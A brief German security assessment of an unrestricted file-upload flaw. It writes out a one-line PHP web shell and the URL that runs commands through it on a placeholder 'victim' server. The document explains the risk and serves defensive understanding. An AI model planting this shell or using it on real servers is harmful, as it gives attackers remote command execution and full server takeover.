Sicherheitsbewertung – Schwachstelle im Dateiupload

Beschreibung: Diese Upload-Funktion speichert beliebige Dateien direkt im Verzeichnis uploads/ ohne jede Prüfung auf Typ oder Inhalt.

• Es gibt keine Filterung nach erlaubten Dateitypen (z. B. nur Bilder).
• Ein Angreifer kann somit z. B. eine .php-Datei hochladen.
• Diese könnte direkt per Browser ausgeführt werden: http://victim/uploads/shell.php

Beispiel (gefährlicher Upload):

Dateiname: shell.php
Inhalt:
<?php system($_GET['cmd']); ?>

Nach dem Hochladen aufrufen mit:

http://victim/uploads/shell.php?cmd=whoami

⚠️ Fazit:

Dieser Code demonstriert eine klassische unsichere Dateiupload-Schwachstelle. Sie kann zur vollständigen Übernahme des Webservers führen.